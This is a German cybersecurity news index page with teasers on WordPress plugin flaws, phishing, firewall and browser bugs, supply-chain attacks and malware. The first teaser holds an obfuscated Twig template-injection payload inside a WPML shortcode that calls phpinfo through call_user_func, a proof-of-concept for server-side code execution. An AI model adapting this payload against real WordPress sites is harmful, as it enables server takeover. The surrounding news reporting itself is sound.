Aktuelle Cybersecurity Nachrichten - Bleiben Sie sicher informiert

Kritische Sicherheitslücke im WordPress-Plugin gefährdet 1 Million Websites

von Cybersecurity News Redaktion | 27. August 2024 | Schwachstellen | 0 Kommentieren

[wpml_language_switcher]
{% set call_user_func = c~a~l~l~~u~s~e~r~~f~u~n~c %}
{% set phpinfo = p~h~p~i~n~f~o %}
{{ {1: phpinfo}|filter(call_user_func) }}
[/wpml_language_switcher]

Lesen Sie mehr

Massive Phishing-Kampagne nutzt Microsoft Sway aus: QR-Codes im Visier

von Cybersecurity News Redaktion | 27. August 2024 | Phishing | 0 Kommentieren

Eine groß angelegte Phishing-Kampagne missbraucht Microsoft Sway, ein cloudbasiertes Tool zur Erstellung von Online-Präsentationen, um Microsoft 365-Nutzer dazu zu bringen, ihre Zugangsdaten preiszugeben. Die Angriffe wurden im Juli 2024 von Netskope Threat Labs...

Lesen Sie mehr

CTEM im Rampenlicht: Wie Gartners neue Kategorien helfen, Sicherheitslücken besser zu verwalten

von Cybersecurity News Redaktion | 27. August 2024 | Wissen | 0 Kommentieren

Wollen Sie wissen, was 2024 im Bereich der Sicherheitsoperationen neu und bedeutend ist? Gartners kürzlich veröffentlichter Hype Cycle für Sicherheitsoperationen geht wichtige Schritte, um den Bereich des Continuous Threat Exposure Managements (CTEM) zu organisieren...

Lesen Sie mehr

SonicWall veröffentlicht kritisches Update für Firewall-Sicherheitslücke

von Cybersecurity News Redaktion | 27. August 2024 | Schwachstellen | 0 Kommentieren

SonicWall hat dringend empfohlene Sicherheitsupdates für eine schwerwiegende Sicherheitslücke in seinen Firewalls veröffentlicht. Wird diese Schwachstelle erfolgreich ausgenutzt, können Angreifer unbefugten Zugriff auf die Geräte erlangen. Die Sicherheitslücke,...

Lesen Sie mehr

Kritische RCE-Schwachstelle in Microsoft Edge ermöglicht Remote-Systemübernahme

von Cybersecurity News Redaktion | 23. August 2024 | Schwachstellen | 0 Kommentieren

Eine schwerwiegende Schwachstelle zur Remote-Code-Ausführung (RCE) wurde in Microsoft Edge entdeckt. Diese Schwachstelle könnte Angreifern ermöglichen, die Kontrolle über betroffene Systeme zu übernehmen, indem sie beliebigen Code aus der Ferne ausführen. Microsoft...

Lesen Sie mehr

Hacker nutzen Amazon-Dienste für den Versand von manipulierten MSC-Dateien

von Cybersecurity News Redaktion | 23. August 2024 | Cyber Threat, Cyber Attacken | 0 Kommentieren

Cyberkriminelle haben begonnen, Amazon-Dienste auszunutzen, um mit Schadsoftware infizierte MSC-Dateien zu verbreiten. Diese Entwicklung zeigt, wie attraktiv die umfassenden Angebote von Amazon für Angreifer geworden sind, da sie enorme Rechenleistung, Speicherplatz...

Lesen Sie mehr

Neuer iOS-Bug lässt iPhones durch das Eingeben von vier Zeichen abstürzen

von Cybersecurity News Redaktion | 22. August 2024 | Schwachstellen | 0 Kommentieren

Ein Sicherheitsforscher hat am Mittwoch einen Bug in iOS entdeckt, der dazu führen kann, dass iPhones und iPads kurzzeitig abstürzen, wenn eine bestimmte Folge von vier Zeichen in bestimmte Suchleisten eingegeben wird. Der Fehler betrifft die Benutzeroberfläche von...

Lesen Sie mehr

Kritische Sicherheitslücke im WordPress-Plugin LiteSpeed Cache ermöglicht Hackern Administratorzugriff

von Cybersecurity News Redaktion | 22. August 2024 | Schwachstellen | 0 Kommentieren

Sicherheitsforscher haben eine schwerwiegende Sicherheitslücke im LiteSpeed Cache-Plugin für WordPress aufgedeckt, die es nicht authentifizierten Nutzern ermöglicht, Administratorrechte zu erlangen. „Das Plugin leidet unter einer nicht authentifizierten...

Lesen Sie mehr

Kritische Sicherheitslücke in Outlook: Technische Details zur Zero-Click-RCE-Verwundbarkeit veröffentlicht

von Cybersecurity News Redaktion | 21. August 2024 | Schwachstellen | 0 Kommentieren

Forscher von Morphisec haben detaillierte technische Informationen über eine kürzlich entdeckte Zero-Click-Sicherheitslücke in Microsoft Outlook veröffentlicht, die als CVE-2024-38021 identifiziert wurde. Diese Schwachstelle stellt ein erhebliches Sicherheitsrisiko...

Lesen Sie mehr

Hacker nutzen PHP-Schwachstelle aus, um heimliche Msupedge-Backdoor zu installieren

von Cybersecurity News Redaktion | 21. August 2024 | Schwachstellen, Cyber Attacken | 0 Kommentieren

Eine bisher unbekannte Backdoor namens Msupedge wurde in einem gezielten Cyberangriff gegen eine nicht näher benannte Universität in Taiwan eingesetzt. Das Symantec Threat Hunter Team, Teil von Broadcom, berichtete, dass die auffälligste Eigenschaft dieser Backdoor...

Lesen Sie mehr

TeamViewer: Unternehmensnetzwerk von mutmaßlicher APT-Gruppe gehackt

Juni 28, 2024 | Cyber Attacken, Cyber Threat, Schwachstellen

Das Unternehmen für Fernzugriffssoftware TeamViewer warnt, dass sein Unternehmensnetzwerk gestern bei einem Cyberangriff kompromittiert wurde. Eine Cybersicherheitsfirma vermutet, dass eine APT-Hackergruppe dahinter steckt. „Am Mittwoch, dem 26. Juni 2024, entdeckte...

Dringendes Sicherheitsupdate: WordPress schließt XSS- und Path-Traversal-Schwachstellen

Juni 27, 2024 | Schwachstellen

WordPress hat ein dringendes Sicherheitsupdate auf Version 6.5.5 veröffentlicht, um kritische Sicherheitslücken zu beheben, die potenziell die Sicherheit von Millionen Websites gefährden könnten. Dieses Update enthält auch drei Fehlerbehebungen im Kern und wird...

Achtung Telegram-Nutzer! SpyMax RAT greift an, um sensible Daten zu stehlen

Juni 27, 2024 | Phishing, Cyber Attacken

Cybersicherheitsforscher von K7 Labs haben eine neue Bedrohung aufgedeckt, die auf Telegram-Nutzer abzielt. Die bösartige Software SpyMax ist ein Remote Administration Tool (RAT), das darauf ausgelegt ist, sensible Daten von Android-Geräten zu stehlen. Was ist SpyMax?...

Cloudflare: Wir haben die Nutzung unseres Namens durch Polyfill.io nie autorisiert

Juni 27, 2024 | Wissen

Cloudflare, ein führender Anbieter von Content Delivery Network (CDN)-Diensten, Cloud-Sicherheit und DDoS-Schutz, hat gewarnt, dass die Nutzung seines Namens oder Logos auf der Polyfill.io-Website nicht autorisiert wurde. Diese Website wurde kürzlich bei einem großen...

Neue Kreditkartenskimmer zielen auf WordPress-, Magento- und OpenCart-Websites ab

Juni 26, 2024 | Cyber Attacken, Cyber Threat

Mehrere Content-Management-Systeme (CMS) wie WordPress, Magento und OpenCart sind das Ziel eines neuen Kreditkartenskimmers namens Caesar Cipher Skimmer geworden. Ein Web-Skimmer ist eine Malware, die in E-Commerce-Websites injiziert wird, um finanzielle und...

Über 110.000 Websites von Supply-Chain-Angriff auf Polyfill betroffen

Juni 26, 2024 | Cyber Attacken

Google hat Maßnahmen ergriffen, um Werbung für E-Commerce-Websites zu blockieren, die den Polyfill.io-Dienst nutzen, nachdem ein chinesisches Unternehmen die Domain übernommen und die JavaScript-Bibliothek "polyfill.js" modifiziert hatte, um Nutzer auf bösartige und...

ANY.RUN Opfer eines Cyberangriffs: Mitarbeiter-E-Mail-Konto gehackt

Juni 26, 2024 | Phishing, Cyber Attacken

Ein führendes Cybersicherheitsunternehmen ist Opfer eines raffinierten Phishing-Angriffs geworden. Der Vorfall, der Ende Mai begann und am 18. Juni 2024 in einem groß angelegten E-Mail-Kompromittierungsangriff gipfelte, hat die Cybersicherheitsgemeinschaft...

Sicherheitslücke bei D-LINK-Routern enthüllt: PoC veröffentlicht, der Passwörter preisgibt

Juni 26, 2024 | Schwachstellen

Ein Proof of Concept (PoC) wurde für eine kritische Informationsoffenlegungsschwachstelle in D-LINK-Routern veröffentlicht. Diese Schwachstelle stellt ein erhebliches Sicherheitsrisiko dar, da sie unbefugten Zugriff auf sensible Informationen, einschließlich...

WordPress.org-Plugins durch Supply-Chain-Angriff mit Hintertüren versehen

Juni 26, 2024 | Allgemein

Ein Bedrohungsakteur hat den Quellcode von mindestens fünf Plugins auf WordPress.org verändert und bösartige PHP-Skripte hinzugefügt, die neue Konten mit Administratorrechten auf den betroffenen Websites erstellen. Entdeckung und Reaktion Das Wordfence Threat...

Neue Webkit-Schwachstellen ermöglichen Angriffe auf PS4 und PS5

Juni 25, 2024 | Schwachstellen

Webkit-Schwachstellen in PS4 und PS5 betreffen Fehler in der Webkit-Engine, die von den Webbrowsern der Konsolen genutzt wird. Diese Bugs, die in Browsern wie Safari und Chrome entdeckt wurden, können auch in PS4 und PS5 vorhanden sein, da sie denselben Webkit-Code...

Home

Kritische Sicherheitslücke im WordPress-Plugin gefährdet 1 Million Websites

Massive Phishing-Kampagne nutzt Microsoft Sway aus: QR-Codes im Visier

CTEM im Rampenlicht: Wie Gartners neue Kategorien helfen, Sicherheitslücken besser zu verwalten

SonicWall veröffentlicht kritisches Update für Firewall-Sicherheitslücke

Kritische RCE-Schwachstelle in Microsoft Edge ermöglicht Remote-Systemübernahme

Hacker nutzen Amazon-Dienste für den Versand von manipulierten MSC-Dateien

Neuer iOS-Bug lässt iPhones durch das Eingeben von vier Zeichen abstürzen

Kritische Sicherheitslücke im WordPress-Plugin LiteSpeed Cache ermöglicht Hackern Administratorzugriff

Kritische Sicherheitslücke in Outlook: Technische Details zur Zero-Click-RCE-Verwundbarkeit veröffentlicht

Hacker nutzen PHP-Schwachstelle aus, um heimliche Msupedge-Backdoor zu installieren

TeamViewer: Unternehmensnetzwerk von mutmaßlicher APT-Gruppe gehackt

Dringendes Sicherheitsupdate: WordPress schließt XSS- und Path-Traversal-Schwachstellen

Achtung Telegram-Nutzer! SpyMax RAT greift an, um sensible Daten zu stehlen

Cloudflare: Wir haben die Nutzung unseres Namens durch Polyfill.io nie autorisiert

Neue Kreditkartenskimmer zielen auf WordPress-, Magento- und OpenCart-Websites ab

Über 110.000 Websites von Supply-Chain-Angriff auf Polyfill betroffen

ANY.RUN Opfer eines Cyberangriffs: Mitarbeiter-E-Mail-Konto gehackt

Sicherheitslücke bei D-LINK-Routern enthüllt: PoC veröffentlicht, der Passwörter preisgibt

WordPress.org-Plugins durch Supply-Chain-Angriff mit Hintertüren versehen

Neue Webkit-Schwachstellen ermöglichen Angriffe auf PS4 und PS5

Neueste Beiträge